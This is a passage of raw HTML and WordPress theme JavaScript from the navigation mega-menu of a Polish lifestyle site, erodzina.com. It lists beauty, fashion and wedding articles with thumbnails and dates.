class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/skora-i-wlosy\/\" class=\"td-post-category\">Sk\u00f3ra i w\u0142osy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/urzekajacy-makijaz-wieczorowy-jak-go-zrobic\/\" rel=\"bookmark\" title=\"Urzekaj\u0105cy makija\u017c wieczorowy \u2013 jak go zrobi\u0107?\">Urzekaj\u0105cy makija\u017c wieczorowy \u2013 jak go zrobi\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-20T14:32:08+00:00\" >20 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/farba-do-wlosow-braz-jasny\/\" rel=\"bookmark\" title=\"Farba do w\u0142os\u00f3w \u2013 br\u0105z jasny\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/154149689467768200-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/154149689467768200-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/154149689467768200-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/154149689467768200-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Farba do w\u0142os\u00f3w \u2013 br\u0105z jasny\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/skora-i-wlosy\/\" class=\"td-post-category\">Sk\u00f3ra i w\u0142osy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/farba-do-wlosow-braz-jasny\/\" rel=\"bookmark\" title=\"Farba do w\u0142os\u00f3w \u2013 br\u0105z jasny\">Farba do w\u0142os\u00f3w \u2013 br\u0105z jasny<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-11-07T14:21:45+00:00\" >7 listopada 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jak-wygladzic-wlosy\/\" rel=\"bookmark\" title=\"Jak wyg\u0142adzi\u0107 w\u0142osy?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/fotolia_166984600_subscription_monthly_m-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/fotolia_166984600_subscription_monthly_m-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/fotolia_166984600_subscription_monthly_m-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/fotolia_166984600_subscription_monthly_m-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak wyg\u0142adzi\u0107 w\u0142osy?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/uroda-i-styl\/skora-i-wlosy\/\" class=\"td-post-category\">Sk\u00f3ra i w\u0142osy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jak-wygladzic-wlosy\/\" rel=\"bookmark\" title=\"Jak wyg\u0142adzi\u0107 w\u0142osy?\">Jak wyg\u0142adzi\u0107 w\u0142osy?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-09-19T07:46:56+00:00\" >19 wrze\u015bnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_62_5c5e20b7aa09a","td_hide_prev":true,"td_hide_next":false}));
                                    </script>
            <div class="td-container td_block_wrap td_block_mega_menu td_uid_62_5c5e20b7aa09a_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_62_5c5e20b7aa09a"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="mega-menu-sub-cat-td_uid_62_5c5e20b7aa09a" id="td_uid_63_5c5e20b7aa413" data-td_block_id="td_uid_62_5c5e20b7aa09a" data-td_filter_value="76" href="http://www.erodzina.com/kategoria/uroda-i-styl/chirurgia-plastyczna/">Chirurgia plastyczna</a><a class="mega-menu-sub-cat-td_uid_62_5c5e20b7aa09a" id="td_uid_64_5c5e20b7aa443" data-td_block_id="td_uid_62_5c5e20b7aa09a" data-td_filter_value="48" href="http://www.erodzina.com/kategoria/uroda-i-styl/dlonie-i-stopy/">Dłonie i stopy</a><a class="mega-menu-sub-cat-td_uid_62_5c5e20b7aa09a" id="td_uid_65_5c5e20b7aa46a" data-td_block_id="td_uid_62_5c5e20b7aa09a" data-td_filter_value="50" href="http://www.erodzina.com/kategoria/uroda-i-styl/kosmetyki/">Kosmetyki</a><a class="mega-menu-sub-cat-td_uid_62_5c5e20b7aa09a" id="td_uid_66_5c5e20b7aa48e" data-td_block_id="td_uid_62_5c5e20b7aa09a" data-td_filter_value="46" href="http://www.erodzina.com/kategoria/uroda-i-styl/moda-i-uroda/">Moda i uroda</a><a class="mega-menu-sub-cat-td_uid_62_5c5e20b7aa09a" id="td_uid_67_5c5e20b7aa4b2" data-td_block_id="td_uid_62_5c5e20b7aa09a" data-td_filter_value="49" href="http://www.erodzina.com/kategoria/uroda-i-styl/piekny-usmiech/">Piękny uśmiech</a><a class="mega-menu-sub-cat-td_uid_62_5c5e20b7aa09a" id="td_uid_68_5c5e20b7aa4d6" data-td_block_id="td_uid_62_5c5e20b7aa09a" data-td_filter_value="47" href="http://www.erodzina.com/kategoria/uroda-i-styl/skora-i-wlosy/">Skóra i włosy</a><a class="cur-sub-cat mega-menu-sub-cat-td_uid_62_5c5e20b7aa09a mega-menu-cat-all" id="td_uid_69_5c5e20b7aa4fa" data-td_block_id="td_uid_62_5c5e20b7aa09a" data-td_filter_value="" href="http://www.erodzina.com/kategoria/uroda-i-styl/">Wszystko Uroda i Styl</a></div></div><div id="td_uid_62_5c5e20b7aa09a" class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/ktora-bizuteria-okaze-sie-najlepszym-wyborem/" rel="bookmark" title="Która biżuteria okaże się najlepszym wyborem?"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2019/01/hand-3938729_960_720-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/01/hand-3938729_960_720-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2019/01/hand-3938729_960_720-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/01/hand-3938729_960_720-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Która biżuteria okaże się najlepszym wyborem?"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/uroda-i-styl/moda-i-uroda/" class="td-post-category">Moda i uroda</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/ktora-bizuteria-okaze-sie-najlepszym-wyborem/" rel="bookmark" title="Która biżuteria okaże się najlepszym wyborem?">Która biżuteria okaże się najlepszym wyborem?</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-01-31T14:04:55+00:00">31 stycznia 2019</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/5-sposobow-na-hipnotyzujace-rzesy/" rel="bookmark" title="5 sposobów na hipnotyzujące rzęsy"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2019/01/hipnotyzujace-rzesy-isadora-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2019/01/hipnotyzujace-rzesy-isadora-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2019/01/hipnotyzujace-rzesy-isadora-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2019/01/hipnotyzujace-rzesy-isadora-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="5 sposobów na hipnotyzujące rzęsy"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/uroda-i-styl/kosmetyki/" class="td-post-category">Kosmetyki</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/5-sposobow-na-hipnotyzujace-rzesy/" rel="bookmark" title="5 sposobów na hipnotyzujące rzęsy">5 sposobów na hipnotyzujące rzęsy</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2019-01-29T17:12:41+00:00">29 stycznia 2019</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/urzekajacy-makijaz-wieczorowy-jak-go-zrobic/" rel="bookmark" title="Urzekający makijaż wieczorowy – jak go zrobić?"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2018/12/fotolia_224482616_subscription_monthly_m-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/12/fotolia_224482616_subscription_monthly_m-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2018/12/fotolia_224482616_subscription_monthly_m-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2018/12/fotolia_224482616_subscription_monthly_m-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Urzekający makijaż wieczorowy – jak go zrobić?"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/uroda-i-styl/skora-i-wlosy/" class="td-post-category">Skóra i włosy</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/urzekajacy-makijaz-wieczorowy-jak-go-zrobic/" rel="bookmark" title="Urzekający makijaż wieczorowy – jak go zrobić?">Urzekający makijaż wieczorowy – jak go zrobić?</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-12-20T14:32:08+00:00">20 grudnia 2018</time></span>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_62_5c5e20b7aa09a" data-td_block_id="td_uid_62_5c5e20b7aa09a"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_62_5c5e20b7aa09a" data-td_block_id="td_uid_62_5c5e20b7aa09a"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-5105"><a href="http://www.erodzina.com/kategoria/slub-i-wesele/" class="sf-with-ul">Ślub<i class="td-icon-menu-down"></i></a>
<ul class="sub-menu" style="display: none; float: none; width: 20em;">
	<li class="menu-item-0" style="white-space: normal; float: left; width: 100%;"><div class="td-container-border"><div class="td-mega-grid"><script>var block_td_uid_70_5c5e20b7b0422 = new tdBlock();
block_td_uid_70_5c5e20b7b0422.id = "td_uid_70_5c5e20b7b0422";
block_td_uid_70_5c5e20b7b0422.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"78","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Wszystko","color_preset":"","border_top":"","class":"td_uid_70_5c5e20b7b0422_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_70_5c5e20b7b0422_rand","tdc_css_class_style":"td_uid_70_5c5e20b7b0422_rand_style","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_70_5c5e20b7b0422.td_column_number = "3";
block_td_uid_70_5c5e20b7b0422.block_type = "td_block_mega_menu";
block_td_uid_70_5c5e20b7b0422.post_count = "3";
block_td_uid_70_5c5e20b7b0422.found_posts = "31";
block_td_uid_70_5c5e20b7b0422.header_color = "";
block_td_uid_70_5c5e20b7b0422.ajax_pagination_infinite_stop = "";
block_td_uid_70_5c5e20b7b0422.max_num_pages = "11";
tdBlocksArray.push(block_td_uid_70_5c5e20b7b0422);
</script>            <script>
                var tmpObj = JSON.parse(JSON.stringify(block_td_uid_70_5c5e20b7b0422));
                tmpObj.is_ajax_running = true;
                var currentBlockObjSignature = JSON.stringify(tmpObj);
                tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/fotograf-slubny-obowiazkowy-na-weselu\/\" rel=\"bookmark\" title=\"Fotograf \u015blubny &#8211; obowi\u0105zkowy na weselu\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/fot-g\u0142\u00f3wne-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/fot-g\u0142\u00f3wne-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/fot-g\u0142\u00f3wne-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/fot-g\u0142\u00f3wne-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Fotograf \u015blubny &#8211; obowi\u0105zkowy na weselu\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/slub-i-wesele\/para-mloda\/\" class=\"td-post-category\">Para M\u0142oda<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/fotograf-slubny-obowiazkowy-na-weselu\/\" rel=\"bookmark\" title=\"Fotograf \u015blubny &#8211; obowi\u0105zkowy na weselu\">Fotograf \u015blubny &#8211; obowi\u0105zkowy na weselu<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-11-23T18:52:59+00:00\" >23 listopada 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/okragla-rocznica-slubu-rodzicow-4-pomysly-na-niezapomniany-prezent\/\" rel=\"bookmark\" title=\"Okr\u0105g\u0142a rocznica \u015blubu rodzic\u00f3w? 4 pomys\u0142y na niezapomniany prezent\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/7afbf647695e43aaacb00cb3faac05ae-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/7afbf647695e43aaacb00cb3faac05ae-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/7afbf647695e43aaacb00cb3faac05ae-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/7afbf647695e43aaacb00cb3faac05ae-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Okr\u0105g\u0142a rocznica \u015blubu rodzic\u00f3w? 4 pomys\u0142y na niezapomniany prezent\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/slub-i-wesele\/para-mloda\/\" class=\"td-post-category\">Para M\u0142oda<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/okragla-rocznica-slubu-rodzicow-4-pomysly-na-niezapomniany-prezent\/\" rel=\"bookmark\" title=\"Okr\u0105g\u0142a rocznica \u015blubu rodzic\u00f3w? 4 pomys\u0142y na niezapomniany prezent\">Okr\u0105g\u0142a rocznica \u015blubu rodzic\u00f3w? 4 pomys\u0142y na niezapomniany prezent<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-09-29T09:25:07+00:00\" >29 wrze\u015bnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/bizuteria-slubna-ma-znaczenie\/\" rel=\"bookmark\" title=\"Bi\u017cuteria \u015blubna ma znaczenie\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/g\u0142\u00f3wne_2-bizuteria-topsilver.pl_-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/g\u0142\u00f3wne_2-bizuteria-topsilver.pl_-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/g\u0142\u00f3wne_2-bizuteria-topsilver.pl_-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/g\u0142\u00f3wne_2-bizuteria-topsilver.pl_-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Bi\u017cuteria \u015blubna ma znaczenie\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/slub-i-wesele\/para-mloda\/\" class=\"td-post-category\">Para M\u0142oda<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/bizuteria-slubna-ma-znaczenie\/\" rel=\"bookmark\" title=\"Bi\u017cuteria \u015blubna ma znaczenie\">Bi\u017cuteria \u015blubna ma znaczenie<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-07-26T12:01:15+00:00\" >26 lipca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_70_5c5e20b7b0422","td_hide_prev":true,"td_hide_next":false}));
                                            tmpObj = JSON.parse(JSON.stringify(block_td_uid_70_5c5e20b7b0422));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 79;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/fotograf-slubny-obowiazkowy-na-weselu\/\" rel=\"bookmark\" title=\"Fotograf \u015blubny &#8211; obowi\u0105zkowy na weselu\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/fot-g\u0142\u00f3wne-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/fot-g\u0142\u00f3wne-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/fot-g\u0142\u00f3wne-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/11\/fot-g\u0142\u00f3wne-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Fotograf \u015blubny &#8211; obowi\u0105zkowy na weselu\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/slub-i-wesele\/para-mloda\/\" class=\"td-post-category\">Para M\u0142oda<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/fotograf-slubny-obowiazkowy-na-weselu\/\" rel=\"bookmark\" title=\"Fotograf \u015blubny &#8211; obowi\u0105zkowy na weselu\">Fotograf \u015blubny &#8211; obowi\u0105zkowy na weselu<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-11-23T18:52:59+00:00\" >23 listopada 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/okragla-rocznica-slubu-rodzicow-4-pomysly-na-niezapomniany-prezent\/\" rel=\"bookmark\" title=\"Okr\u0105g\u0142a rocznica \u015blubu rodzic\u00f3w? 4 pomys\u0142y na niezapomniany prezent\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/7afbf647695e43aaacb00cb3faac05ae-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/7afbf647695e43aaacb00cb3faac05ae-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/7afbf647695e43aaacb00cb3faac05ae-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/7afbf647695e43aaacb00cb3faac05ae-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Okr\u0105g\u0142a rocznica \u015blubu rodzic\u00f3w? 4 pomys\u0142y na niezapomniany prezent\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/slub-i-wesele\/para-mloda\/\" class=\"td-post-category\">Para M\u0142oda<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/okragla-rocznica-slubu-rodzicow-4-pomysly-na-niezapomniany-prezent\/\" rel=\"bookmark\" title=\"Okr\u0105g\u0142a rocznica \u015blubu rodzic\u00f3w? 4 pomys\u0142y na niezapomniany prezent\">Okr\u0105g\u0142a rocznica \u015blubu rodzic\u00f3w? 4 pomys\u0142y na niezapomniany prezent<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-09-29T09:25:07+00:00\" >29 wrze\u015bnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/bizuteria-slubna-ma-znaczenie\/\" rel=\"bookmark\" title=\"Bi\u017cuteria \u015blubna ma znaczenie\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/g\u0142\u00f3wne_2-bizuteria-topsilver.pl_-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/g\u0142\u00f3wne_2-bizuteria-topsilver.pl_-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/g\u0142\u00f3wne_2-bizuteria-topsilver.pl_-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/g\u0142\u00f3wne_2-bizuteria-topsilver.pl_-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Bi\u017cuteria \u015blubna ma znaczenie\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/slub-i-wesele\/para-mloda\/\" class=\"td-post-category\">Para M\u0142oda<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/bizuteria-slubna-ma-znaczenie\/\" rel=\"bookmark\" title=\"Bi\u017cuteria \u015blubna ma znaczenie\">Bi\u017cuteria \u015blubna ma znaczenie<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-07-26T12:01:15+00:00\" >26 lipca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_70_5c5e20b7b0422","td_hide_prev":true,"td_hide_next":false}));
                                    </script>
            <div class="td-container td_block_wrap td_block_mega_menu td_uid_70_5c5e20b7b0422_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_70_5c5e20b7b0422"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="mega-menu-sub-cat-td_uid_70_5c5e20b7b0422" id="td_uid_71_5c5e20b7b0780" data-td_block_id="td_uid_70_5c5e20b7b0422" data-td_filter_value="79" href="http://www.erodzina.com/kategoria/slub-i-wesele/para-mloda/">Para Młoda</a><a class="cur-sub-cat mega-menu-sub-cat-td_uid_70_5c5e20b7b0422 mega-menu-cat-all" id="td_uid_72_5c5e20b7b07b0" data-td_block_id="td_uid_70_5c5e20b7b0422" data-td_filter_value="" href="http://www.erodzina.com/kategoria/slub-i-wesele/">Wszystko Ślub i Wesele</a></div></div><div id="td_uid_70_5c5e20b7b0422" class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/fotograf-slubny-obowiazkowy-na-weselu/" rel="bookmark" title="Fotograf ślubny – obowiązkowy na weselu"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2018/11/fot-główne-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/11/fot-główne-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2018/11/fot-główne-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2018/11/fot-główne-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Fotograf ślubny – obowiązkowy na weselu"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/slub-i-wesele/para-mloda/" class="td-post-category">Para Młoda</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/fotograf-slubny-obowiazkowy-na-weselu/" rel="bookmark" title="Fotograf ślubny – obowiązkowy na weselu">Fotograf ślubny – obowiązkowy na weselu</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-11-23T18:52:59+00:00">23 listopada 2018</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.erodzina.com/okragla-rocznica-slubu-rodzicow-4-pomysly-na-niezapomniany-prezent/" rel="bookmark" title="Okrągła rocznica ślubu rodziców? 4 pomysły na niezapomniany prezent"><img width="260" height="195" class="entry-thumb" src="http://www.erodzina.com/wp-content/uploads/2018/09/7afbf647695e43aaacb00cb3faac05ae-260x195.jpg" srcset="http://www.erodzina.com/wp-content/uploads/2018/09/7afbf647695e43aaacb00cb3faac05ae-260x195.jpg 260w, http://www.erodzina.com/wp-content/uploads/2018/09/7afbf647695e43aaacb00cb3faac05ae-80x60.jpg 80w, http://www.erodzina.com/wp-content/uploads/2018/09/7afbf647695e43aaacb00cb3faac05ae-245x184.jpg 245w" sizes="(max-width: 260px) 100vw, 260px" alt="" title="Okrągła rocznica ślubu rodziców? 4 pomysły na niezapomniany prezent"></a></div>                <div class="td-post-category-wrap"><a href="http://www.erodzina.com/kategoria/slub-i-wesele/para-mloda/" class="td-post-category">Para Młoda</a></div>
            </div>

            <div class="td-item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.erodzina.com/okragla-rocznica-slubu-rodzicow-4-pomysly-na-niezapomniany-prezent/" rel="bookmark" title="Okrągła rocznica ślubu rodziców? 4 pomysły na niezapomniany prezent">Okrągła rocznica ślubu rodziców? 4 pomysły na niezapomniany prezent</a></h3>                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-09-29T09:25:07+00:00">29 września 2018</time></span>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
